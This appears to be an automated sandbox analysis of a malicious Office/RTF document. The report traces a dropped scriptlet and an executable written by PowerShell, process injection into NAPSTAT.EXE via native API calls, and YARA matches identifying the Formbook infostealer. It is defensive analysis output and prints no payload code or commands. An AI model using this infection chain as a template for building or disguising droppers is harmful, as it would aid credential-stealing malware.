          Source: Screenshot number: 8Screenshot OCR: Enable Editing when opening. O "g"' 0' ' I Wo"" "' I '3 I _ 1@ 13 '00% G) A GE) a 0 m
          Source: Screenshot number: 12Screenshot OCR: Enable Editing when opening. ii: ^ . . . . . 's . . . . .layer . . . . . . a"t , au'qj . . . ,.
          Found suspicious RTF objectsShow sources
          Source: AbctfhgXgdghgh.ScTStatic RTF information: Object: 0 Offset: 00007110h AbctfhgXgdghgh.ScT
          Microsoft Office creates scripting filesShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Abctfhghgdghgh .ScTJump to behavior
          Office process drops PE fileShow sources
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\docsc[1].exeJump to dropped file
          PE file contains section with special charsShow sources
          Source: docsc[1].exe.0.drStatic PE information: section name: U#j;F_`
          Source: docsc.exe.3.drStatic PE information: section name: U#j;F_`
          PE file has nameless sectionsShow sources
          Source: docsc[1].exe.0.drStatic PE information: section name:
          Source: docsc.exe.3.drStatic PE information: section name:
          Powershell drops PE fileShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\docsc.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\docsc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004181C0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00418270 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004182F0 NtClose,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041826A NtReadFile,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00730078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00730060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007310D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00731148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007301D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00731930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00730C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FD5C NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00731D80 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FE24 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FF34 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0072FFFC NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002767C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002767C2 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0209FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000981C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00098270 NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000982F0 NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_000983A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009826A NtReadFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009839A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D2450
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6C78
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D1881
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D2CCA
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D04E2
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D4590
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DC1B0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DB1A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D36B0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5410
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6830
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6821
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5420
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D4466
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D44A0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DA1B0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5210
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6610
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6601
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DD268
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001DCE68
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6A98
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D6AA8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D76DA
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_001D5FA0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431170
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431B58
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004344C8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00436550
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00434D21
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004316B8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00430740
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00435740
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00430048
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004388C8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004338A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004372A0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431B48
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00438B58
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_0043DC28
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_0043EC28
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00438CF8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00431491
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00437498
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004314A0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004386A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_004316A8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00430730
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_0043D780
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661750
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00662EB8
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661968
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661956
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661350
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_006613B6
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 10_2_00661983
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00401030
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041C273
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BAA2
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00408C5B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00408C60
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BC22
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041CC24
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041B4A6
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BD4F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041C501
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00402D87
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00402D90
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BDBD
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041BF3C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0041C7A5
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0075905A
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00743040
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0076D005
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073E0C6
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007E1238
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073E2E9
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0078A37B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00747353
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00742305
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007663DB
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073F3CF
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0077D47D
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00775485
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00751489
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00786540
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074351F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0075C5F0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007E2622
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074E6C1
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00744680
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007757C3
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074C7BC
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007C579A
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0076286D
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074C85C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007DF8EE
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007C5955
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007569FE
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007429B2
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007E098E
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007F3A83
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00767B00
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0073FBD7
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007CDBDA
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007ECBA4
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0074CD5B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00770D3B
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_007DFDDD
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0075EE4C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00772E2F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_0076DF7C
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00750F3F
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002767C7
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00275062
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002708F9
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00270902
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002732FF
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00273302
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_00271362
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: 12_2_002775B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02151238
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AE2E9
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B2305
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B7353
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020FA37B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_021563BF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AF3CF
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020D63DB
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020DD005
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B3040
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C905A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0212D06D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AE0C6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02152622
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020FA634
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B4680
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BE6C1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213579A
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BC7BC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E57C3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213443E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020ED47D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C1489
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E5485
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B351F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020F6540
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_021305E3
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020CC5F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02163A83
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020D7B00
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0215CBA4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213DBDA
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020AFBD7
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BC85C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020D286D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0212F8C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0214F8EE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02135955
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0213394B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0215098E
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020B29B2
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C69FE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E2E2F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020CEE4C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020C0F3F
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020DDF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0214CFB1
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_02122FDC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020E0D3B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_020BCD5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0214FDDD
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009B4A6
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009C7A5
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_0009CC24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00088C5B
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00088C60
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00082D87
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00082D90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 14_2_00082FB0
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 007AF970 appears 81 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 00783F92 appears 108 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 0078373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 0073E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\docsc.exeCode function: String function: 0073DF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020ADF5C appears 121 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020F373B appears 245 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020F3F92 appears 132 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 020AE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0211F970 appears 84 times
          Source: docsc[1].exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: docsc.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.2353921064.0000000000250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
